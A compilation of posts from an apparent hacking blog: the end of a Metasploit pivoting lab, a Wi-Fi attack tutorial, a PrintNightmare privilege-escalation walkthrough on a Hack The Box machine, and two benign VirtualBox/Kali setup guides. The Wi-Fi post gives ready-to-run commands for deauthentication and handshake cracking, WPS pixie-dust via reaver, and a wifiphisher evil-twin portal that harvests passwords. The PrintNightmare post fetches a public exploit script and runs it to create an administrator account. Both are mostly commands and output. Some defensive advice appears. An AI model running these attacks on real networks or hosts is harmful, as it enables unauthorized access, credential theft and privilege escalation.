msf6 post(multi/gather/ping_sweep) > run
[*] Performing ping sweep for IP range 192.168.242.0/24
[+] 192.168.242.3 host found
[+] 192.168.242.2 host found
[+] 192.168.242.4 host found

Scanning Ports Through Pivoting

Sure enough, our host was there. Don’t ask me what the other ones are, I honestly don’t know and at this point, I’m too afraid to ask. Our target IP address was 192.168.242.4. So what’s next? service discovery obviously. I selected the portscan/tcp module and configured it to target the host. I ran the module and sure enough it found all the open ports on the host.

msf6 auxiliary(scanner/portscan/tcp) > options
Module options (auxiliary/scanner/portscan/tcp): Name Current Setting Required Description
---- --------------- -------- -----------
CONCURRENCY 10 yes
DELAY 0 yes
JITTER 0 yes
PORTS 1-10000 yes
RHOSTS 192.168.242.4 yes
THREADS 1 yes
TIMEOUT 1000 yes msf6 auxiliary(scanner/portscan/tcp) > run[+] 192.168.242.4: - 192.168.242.4:25 - TCP OPEN
[+] 192.168.242.4: - 192.168.242.4:23 - TCP OPEN
[+] 192.168.242.4: - 192.168.242.4:21 - TCP OPEN
[+] 192.168.242.4: - 192.168.242.4:22 - TCP OPEN
[+] 192.168.242.4: - 192.168.242.4:53 - TCP OPEN
[+] 192.168.242.4: - 192.168.242.4:80 - TCP OPEN
[+] 192.168.242.4: - 192.168.242.4:111 - TCP OPEN
[+] 192.168.242.4: - 192.168.242.4:139 - TCP OPEN
[+] 192.168.242.4: - 192.168.242.4:445 - TCP OPEN
[+] 192.168.242.4: - 192.168.242.4:512 - TCP OPEN
[+] 192.168.242.4: - 192.168.242.4:513 - TCP OPEN
[+] 192.168.242.4: - 192.168.242.4:514 - TCP OPEN
[+] 192.168.242.4: - 192.168.242.4:1099 - TCP OPEN
[+] 192.168.242.4: - 192.168.242.4:1524 - TCP OPEN
[+] 192.168.242.4: - 192.168.242.4:2049 - TCP OPEN
[+] 192.168.242.4: - 192.168.242.4:2121 - TCP OPEN
[+] 192.168.242.4: - 192.168.242.4:3306 - TCP OPEN
[+] 192.168.242.4: - 192.168.242.4:3632 - TCP OPEN
[+] 192.168.242.4: - 192.168.242.4:5432 - TCP OPEN
[+] 192.168.242.4: - 192.168.242.4:5900 - TCP OPEN
[+] 192.168.242.4: - 192.168.242.4:6000 - TCP OPEN
[+] 192.168.242.4: - 192.168.242.4:6667 - TCP OPEN
[+] 192.168.242.4: - 192.168.242.4:6697 - TCP OPEN
[+] 192.168.242.4: - 192.168.242.4:8009 - TCP OPEN
[+] 192.168.242.4: - 192.168.242.4:8180 - TCP OPEN
[+] 192.168.242.4: - 192.168.242.4:8787 - TCP OPEN
[*] 192.168.242.4: - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Just to be on the safe side I tried to ping the host from my Kali VM to ensure I hadn’t messed something up. Sure enough, the network was unreachable.

┌──(kali㉿kali)-[~]
└─$ ping 192.168.242.4
ping: connect: Network is unreachable

Conclusion

So that’s what I’ve been doing today. I had this idea late last night when trying to get to sleep. It actually kept me awake for a while until I got up and wrote it down. This happens to me a lot but I do occasionally have some good ideas. Anyway, I really enjoyed this as I haven’t had much opportunity to experiment with pivoting. I’m actually shocked that I didn’t think of doing this sooner as it’s such an obvious method of practicing it. It was fun setting up, other than having a few errors with Metasploit due to some scripts being broken. Anyway, that’s me done for the day. I will record a video on this soon and upload it to the tube but until then.

How To Hack Wi-Fi Networks

Hello world, welcome to haxez where today we are going to larn how to hack Wi-Fi Networks. Wi-Fi networks are everywhere! Whether you’re in an industrial or residential area, there will likely be a Wi-Fi access point nearby. They allow us to have instant access to any information we need. They allow us to communicate with people on the other side of the world. We’re living in interesting times where information travels at the speed of light. Hello world, welcome to haxez where today I will be explaining how to hack Wi-Fi networks. If you’re looking for more information on the subject then head over to this article on Bordergate. Also, please go and watch the video at the bottom of the page.

Wi-Fi Hacking Hardware

While it might be possible to perform some Wi-Fi attacks using your built-in Wi-Fi chipset, you will have better success with the proper kit. There are dozens of manufacturers that make claims that their product offers the required functionality. However, after purchasing a bunch of cheap products and some expensive ones, I can honestly say that the Alfa makes the best devices for the job. In order to hack wireless networks, you need to be able to put the card in monitor mode and be able to perform packet injection. Some Alfa cards may be better than others but I’ve had a lot of luck with the AWUS036ACH.

Wi-Fi Hacking Hardware

Wi-Fi Brute-Force Attacks

One attack that doesn’t get mentioned much when discussing Wi-Fi hacking is brute force attacks. Brute force attacks are one of the most common methods that threat actors use to gain access to a system. If the system is secured using a weak password then a brute force attack should get you access to that system pretty quickly. Obviously, this discounts brute force protection mechanisms. However, you would be surprised at how many products don’t offer brute force protection by default. With a few lines of Python, it is possible to brute force the access point’s password. See this GitHub repository for an example.

Wi-Fi Brute-Force Attacks

Wi-Fi Deauthentication Attack

A Wi-Fi deauthentication attack is an attack that abuses the built-in functionality of the access point. The threat actor would impersonate the access point and send spoofed packets to a client. These packets deauthenticate the client. As a result, the client is disconnected from the access point. In order for the client to reconnect to the access point, it needs to send the secret to re-authenticate. The threat actor can then intercept the packet containing the secret and crack it to reveal the access point’s password.

First, you need to put your Wi-Fi adapter into monitor mode and start capturing data. This can be done using airodump-ng.

sudo airodump-ng wlan0

Then, you should start receiving information about the access points nearby.

Wi-Fi Deauthentication Attack

Once you know which Wi-Fi network you want to attack, make a note of the BSSID and the channel number. Next, you need to start capturing packets from that AP and writing them to your local storage. This can be done using the airodump-ng tool again.

sudo airodump-ng --bssid <BSSID> --channel <CHANNEL> --write handshake wlan0
Wi-Fi Deauthentication Attack 2

Next, you need to identify a client to perform the attack. As you can see from the image above, one client has connected and we can see its station ID. Take note of the station ID as it will be needed for the next part of the attack. Using the tool aireplay-ng we can start creating the de-authentication packets and sending them to the client.

sudo aireplay-ng --deauth 4 -a <BSSID> -c <CLIENT STATION ID> wlan0
Wi-Fi Deauthentication Attack 3

Finally, it’s time to crack the password from the packet we just captured. In order to do this we need to use the tool aircrack-ng. First, we specify the wordlist, then the AP BSSID, and finally the packet capture file.

sudo aircrack-ng -w /usr/share/wordlists/rockyou.txt -b <BSSID> handshake.cap
Wi-Fi Deauthentication Attack 4

WPS Pixie-Dust Attack

WPS or Wi-Fi protected setup is a feature of wireless access points that allows for easy pairing of wireless devices. It was created and released by Cisco in 2006 and has since seen several vulnerabilities. One of these vulnerabilities is known as a Pixie Dust attack which brute forces the WPS feature of wireless access points. In order to carry out this attack we first need to set our Wi-Fi adapter to monitor mode.

sudo airmon-ng start wlan0

Next, we need to use the tool wash to identify Wi-Fi access points in the area that have WPS enabled.

sudo wash -i wlan0
WPS Pixie-Dust Attack 1

Take the BSSID and the channel number from the output. Finally, we need to run the tool reaver to start the attack. As you can see from the command below, we’re specifying the BSSID, and the channel number, adding verbosity, specifying an output file, and setting the pixie dust argument to 1. After a few moments, you will receive a bunch of output including the WPS pin and WPA PSK.

sudo reaver --interface wlan0 --bssid <BSSID> --channel <CHANNEL> -vv -N -O output.pcap --pixie-dust 1
WPS Pixie-Dust Attack 2

Evil Twin Attack

An evil twin attack is an attack where the threat actor essentially clones a legitimate access point and coerces the victim to connect to it. Once the victim is connected, the threat actor can then carry out several attacks such as forcing the victim to submit their credentials to a captive portal. This type of attack can be performed using the tool wifiphisher. Once run, you will see a number of access points. Select the one you want to attack.

sudo wifiphisher
Evil Twin Attack

The attack we’re going to be demonstrating is the captive portal attack which will ask the user for their password. Select the attack you want and the tool should start attacking the access point to deauth clients and prevent them from reconnecting.

Evil Twin Attack 2

The clients should then automatically connect to the threat actor’s access point and load the captive portal. The portal will access them for their password. The captive portal page can be customized to mimic social networking sites or even a page mimicking the ISP that provided the access point.

Evil Twin Attack 3

Anything submitted to the captive portal is sent to the threat actor in clear text. If the user submits their Wi-Fi password then the threat actor could now connect to the victim’s Wi-Fi and access their internal network. If they submitted their social media details then the threat actor would have that password which could be used for other online services.

Evil Twin Attack 4

Wi-Fi Hacking With Wifite

We have covered a lot of attacks, some of which have a complicated setup and use multiple tools. However, there is one tool that does almost all of them. That tool is called wifite and it’s a wrapper for the other tools we have used. It’s simple to use, all you need to do is run the wifite command. Within a few seconds, you should start seeing wifi networks pop up.

sudo wifite
Wfite

When you see the network you want to attack, press control c to stop scanning. Then, input the number of the network you want to attack. Wifite will then go through each attack until it finds an attack that works. If you know that a certain type of attack isn’t going to work, it can be skipped with control c. Finally, if the attack is successful, it should automatically crack the password and display the results.

Wifite2

Wi-Fi Hacking Conclusions

While technology is catching up to these types of attacks, your home access point may not have those features. Also, it may not be configured to protect against these attacks out of the box. You want to make sure you’re using long complex passwords not found in wordlists. This will help ensure that even if the threat actor captures the secret, they can’t crack it. Furthermore, you should disable technologies like WPS. If you need it to connect a printer, do so but then disable it after. Anyway, the real reason for this post is to try and get more eyes on the demonstration video below. Please go check it out.

Print Nightmare Privilege Escalation

Hello world, welcome to Haxez. In this post, I’m going to be demonstrating how to perform the Print Nightmare privilege escalation exploit. I will be using Evil-WinRM and the CVE-2021–1675.ps1 script by Caleb Stewart on GitHub. I’ve just completed the retired easy Hack The Box machine Driver and was blown away by this vulnerability. It’s easy to see why it is such a serious vulnerability.

What Is Print Nightmare?

The vulnerability exists because the Spooler service does not properly validate the driver when it is installed on a system. This can allow an attacker to install a malicious driver. Once installed, an attacker can exploit the vulnerability in the Print Spooler service to execute arbitrary code with system-level privileges.

This vulnerability can be exploited even if the user account used to install the driver has limited privileges. This is because the Print Spooler service runs with system-level privileges. This means that it has the ability to install and execute drivers with elevated privileges.

To mitigate the risk of exploitation, it is important to apply the appropriate patches and updates provided by Microsoft. Additionally, implementing other measures such as restricting access to the Spooler service and disabling it on systems.

The Scenario

A threat actor has obtained network access and a domain user’s credentials whether through phishing or some other social engineering attack. They can check the spooler service on the target host via the ‘impacket-rpcdump’ tool. If the following protocol is included in the output then it could be a good candidate for the exploit.

┌──(kali㉿kali)-[~/Driver/scripts]
└─$ impacket-rpcdump @10.129.95.238               
--snip--
Protocol: [MS-RPRN]: Print System Remote Protocol 
Provider: spoolsv.exe 
UUID    : 12345678-1234-ABCD-EF00-0123456789AB v1.0 
Bindings: 
          ncacn_ip_tcp:10.129.95.238[49410]
          ncalrpc:[LRPC-188127abacea381ad9]
--snip--
Print Nightmare rpcdump

The PrintNightmare Payload

In order to leverage this vulnerability to elevate privileges, we first need a payload to exploit it. Such an exploit is publically available on GitHub right now at the following URL https://github.com/calebstewart/CVE-2021-1675. We can use wget on our attack box to download this payload and store it in our scripts directory.

┌──(kali㉿kali)-[~/Driver/scripts]
└─$ wget https://raw.githubusercontent.com/calebstewart/CVE-2021-1675/main/CVE-2021-1675.ps1
--2023-03-17 18:04:25-- https://raw.githubusercontent.com/calebstewart/CVE-2021-1675/main/CVE-2021-1675.ps1
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 2606:50c0:8000::154, 2606:50c0:8001::154, 2606:50c0:8002::154, ...
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|2606:50c0:8000::154|:443... failed: Network is unreachable.
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|2606:50c0:8001::154|:443... failed: Network is unreachable.
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|2606:50c0:8002::154|:443... failed: Network is unreachable.
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|2606:50c0:8003::154|:443... failed: Network is unreachable.
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.108.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 178561 (174K) [text/plain]
Saving to: ‘CVE-2021-1675.ps1.1’
CVE-2021-1675.ps1.1 100%[============================================================================>] 174.38K --.-KB/s in 0.03s
2023-03-17 18:04:26 (4.96 MB/s) - 'CVE-2021-1675.ps1.1' saved [178561/178561]
Print Nightmare wget payload

The Foothold

We will need user credentials in order to perform this exploit. These could be obtained through many nefarious methods but I will leave that to your imagination. Once we have the credentials, we can connect to the box via the Evil-WinRM tool. As you can see from the output below, I’m connecting to the target host with the user tony. Furthermore, the password for tony’s account is ‘liltony’. I’ve specified the target IP address with the ‘-i’ flag and I’ve also specified my script directory with the ‘-s’ flag.

┌──(kali㉿kali)-[~/Driver]
└─$ evil-winrm -i 10.129.95.238 -u 'tony' -p 'liltony' -s /home/kali/Driver/scripts/
Evil-WinRM shell v3.4
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\tony\Documents> menu

,.   (   .      )               "            ,.   (   .      )       .   
  ("  (  )  )'     ,'             (     '    ("     )  )'     ,'   .  ,)  
.; )  ' (( (" )    ;(,      .     ;)  "  )"  .; )  ' (( (" )   );(,   )((   
_".,_,.__).,) (.._( ._),     )  , (._..( '.._"._, . '._)_(..,_(_".) _( _')  
\_   _____/__  _|__|  |    ((  (  /  \    /  \__| ____\______   \  /     \  
 |    __)_\  \/ /  |  |    ;_)_') \   \/\/   /  |/    \|       _/ /  \ /  \ 
 |        \\   /|  |  |__ /_____/  \        /|  |   |  \    |   \/    Y    \
/_______  / \_/ |__|____/           \__/\  / |__|___|  /____|_  /\____|__  /
        \/                               \/          \/       \/         \/
       By: CyberVaca, OscarAkaElvis, Jarilaos, Arale61 @Hackplayers
[+] Dll-Loader 
[+] Donut-Loader 
[+] Invoke-Binary
[+] Bypass-4MSI
[+] services
[+] upload
[+] download
[+] menu
[+] exit
Evil WinRM

The Print Nightmare Exploit

We can now load the script that we saved to our script directory earlier by typing the script name (CVE-2021–1675.ps1). This will then load additional options into Evil-WinRM including the ability to ‘Invoke-Nightmare’. Typing ‘Invoke-Nightmare’ will then generate a new payload that will create a new user and add the user as a local administrator.

*Evil-WinRM* PS C:\Users\tony\Documents> CVE-2021-1675.ps1
*Evil-WinRM* PS C:\Users\tony\Documents> menu
,. ( . ) " ,. ( . ) .
(" ( ) )' ,' ( ' (" ) )' ,' . ,)
.; ) ' (( (" ) ;(, . ;) " )" .; ) ' (( (" ) );(, )((
_".,_,.__).,) (.._( ._), ) , (._..( '.._"._, . '._)_(..,_(_".) _( _')
\_ _____/__ _|__| | (( ( / \ / \__| ____\______ \ / \
| __)_\ \/ / | | ;_)_') \ \/\/ / |/ \| _/ / \ / \
| \\ /| | |__ /_____/ \ /| | | \ | \/ Y \
/_______ / \_/ |__|____/ \__/\ / |__|___| /____|_ /\____|__ /
\/ \/ \/ \/ \/
By: CyberVaca, OscarAkaElvis, Jarilaos, Arale61 @Hackplayers
[+] Add-Win32Type
[+] Dll-Loader
[+] Donut-Loader
[+] field
[+] func
[+] get_nightmare_dll
[+] Invoke-Binary
[+] Invoke-Nightmare
[+] New-InMemoryModule
[+] psenum
[+] struct
[+] Bypass-4MSI
[+] services
[+] upload
[+] download
[+] menu
[+] exit
*Evil-WinRM* PS C:\Users\tony\Documents> Invoke-Nightmare
[+] using default new user: adm1n
[+] using default new password: P@ssw0rd
[+] created payload at C:\Users\tony\AppData\Local\Temp\nightmare.dll
[+] using pDriverPath = "C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_f66d9eed7e835e97\Amd64\mxdwdrv.dll"
[+] added user as local administrator
[+] deleting payload from C:\Users\tony\AppData\Local\Temp\nightmare.dll
Print Nightmare EvilWinRm

The Print Nightmare Consequence

We are now able to remote the target system with the new user. As you can see from the output below, the new user is a member of the local administrator’s group. From here we could install persistence or perform an LSA dump to dump credentials from memory. If a Domain Administrator has logged in to this system then it would be game over for the domain controller.

┌──(kali㉿kali)-[~]
└─$ evil-winrm -i 10.129.95.238 -u 'adm1n' -p 'P@ssw0rd' -s /home/kali/Driver/scripts/
Evil-WinRM shell v3.4
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\adm1n\Documents> net localgroup
net.exe : System error 1312 has occurred.
    + CategoryInfo          : NotSpecified: (System error 1312 has occurred.:String) [], RemoteException
    + FullyQualifiedErrorId : NativeCommandError
A specified logon session does not exist. It may already have been terminated.

*Evil-WinRM* PS C:\Users\adm1n\Documents> whoami /groups
GROUP INFORMATION
-----------------
Group Name                                                    Type             SID          Attributes
============================================================= ================ 
Everyone                                                      Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account and member of Administrators group Well-known group S-1-5-114    Mandatory group, Enabled by default, Enabled group
BUILTIN\Administrators                                        Alias            S-1-5-32-544 Mandatory group, Enabled by default, Enabled group, Group owner
BUILTIN\Users                                                 Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                                          Well-known group S-1-5-2      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users                              Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization                                Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account                                    Well-known group S-1-5-113    Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication                              Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level                          Label            S-1-16-12288
*Evil-WinRM* PS C:\Users\adm1n\Documents>
Whoami

Conclusion

I know that this is an old vulnerability but I recently stumbled on a box that let me pull it off. I thought it was fascinating and was blown away by how simple it was. Granted, that’s down to the developers of the exploit and the developers of Evil-WinRM. However, if I can pull off an exploit like this then anybody can. All it takes is a few misconfigured permissions and the whole domain is at risk. Anyway, I wanted to write a post about it because I thought it was a cool exploit.

Kali Linux Virtual Machine Shared Folder

Hello world, welcome to haxez where today I want to talk about creating a Kali Linux shared folder for your Virtual Machine. They are a useful feature that allows you to share files between your base operating system and your Virtual Machine. While Virtual Machines do have a bidirectional clipboard that allows you to copy to and from each machine. A shared folder allows for easy access to resources such as wordlists and other large files. Furthermore, they can be particularly useful if you have limited disk space on your Virtual Machine.

Creating A Kali Shared Folder

In VirtualBox, this is a fairly simple process. First, you need to select the Virtual Machine that you want to add the shared folder to and click settings.

Creating A Kali Shared Folder
Creating A Shared Folder

Once the settings menu opens you need to navigate to the Shared Folders section in the left-hand column.

Adding A Shared Folder
Adding A Shared Folder

Next, click the blue folder icon with the green plus sign and that will pop up a window with a number of options.

Folder Options

The Folder Path option lets you select where on your base Operating System you want your folder to be. Folder Name allows you to give your folder a specific name when accessing it on your Virtual Machine. The Read-Only option prevents you from making changes to any of the files in the shared directory. Do not tick this if you want to be able to modify your folders. Auto-mount ensures that the folder is mounted on your Virtual Machine once it boots. You want to enable this option. Mount Point specifies where on the Virtual Machine you want it to mount. If you leave this empty then it should default to the /media directory.

Shared Folder Settings
Shared Folder Settings

Accessing Kali Shared Folder

With the settings saved, boot your Virtual Machine and login to the Desktop Environment. Then launch your file manager or file explorer. On the left-hand side, you should see a Devices section containing your File System and your Shared Folder. If not then it could be that you haven’t installed your Virtual Box guest additions.

File Manager
File Manager

Permissions Issues

If you can see the folder but aren’t able to access or create any files then it is likely due to user permissions. In order to resolve this issue, you need to add your user to the VirtualBox users group. This can be done by running the following command.

sudo adduser $USER vboxsf

You should now be able to access the shared folder. It is unlikely that you will need to reboot the machine but if the problem persists then reboot and try again.

Fixing VirtualBox Kali Linux Black Screen

Hello friends and welcome to haxez. So, you have run in to the VirtualBox Kali Linux Black Screen Bug? After all that effort spent downloading it and importing the appliance, you’re excited, you attempt to login in and… nothing. Just a black screen. How disappointing. Do you reinstall it? Give up? Or do you fix it and add that knowledge to your mind palace.

The Cause Of The Kali Linux Black Screen

The likely cause of this problem is due to the VirtualBox Guest Additions either not being installed or not being the correct version. Either way, we need to get them installed to rule this out as a problem.

Kali Linux Black Screen Kali Linux — Login
Kali Linux — Login

Grab A Shell

Start the Virtual Machine and wait for it to get to the login prompt. Before logging in press your right CTRL key (VirtualBox host key) and your F2 key. If you ever need to do this natively on Linux then it will be left CTRL, ALT and F2. This sends a signal to the operating system to spawn a virtual text only terminal or a TTY. To get back to the Desktop environment you need to press left CTRL and F8.

Kali Linux Black Screen Kali Linux — TTY Shell
Kali Linux — TTY Shell

Install The Guest Additions

Now login to the Operating System using your credentials. If it is a Kali Virtual Machine downloaded from their website then the credentials are likely either username: kali, password: kali or username: root, password: toor. Once you have logged in you need to instruct VirtualBox to mount the guest additions CD. From the menu, Devices > Insert Guest Additions CD Image.

VirtualBox — Insert Guest Additions CD
VirtualBox — Insert Guest Additions CD

Kali Linux Black Screen Mount The cdrom

In order to access the content of the Guest Additions CD, you first need to mount it. You could create a mountpoint manually or you could run the following command. As you can see, the command is mounting the device ‘cdrom’ (denoted by the ‘/dev/’ directory) to ‘/media/cdrom’ directory.

sudo mount /dev/cdrom /media/cdrom

Now, if you list out the contents of the ‘/media/cdrom’ directory you should see a file called VBoxLinuxAdditions.run.

Mounting The CD
Mounting The CD

Install The Guest Additions

In order to install the Guest Additions you need to run that VBoxLinuxAdditions.run file. To do this simply run the following command.

sudo /media/cdrom/VBoxLinuxAdditions.run

You may be prompted to press enter but wait for the process to complete and then reboot your system with the reboot command.

sudo reboot
Installing The Guest Additions
Installing The Guest Additions

Login In

Once the system has been rebooted, try logging in with your username and password. Hopefully you should now be presented with your desktop and are able to go about your hacking activities.

Kali Linux Desktop
Kali Linux Desktop

Other Suggestions For Kali Linux Black Screen

If for some reason that didn’t work then there are some other things you could try. One of the other common reasons for this error is due to the display settings. Although changing this has never resolved the problem for me, I thought it was worth a mention. In VirtualBox, head to the settings and then the display settings. Try toggling 3D acceleration and changing the amount of video memory. I’ve heard this has resolved the issue for other people but again I’ve never been able to resolve the problem this way.

Display Settings
Display Settings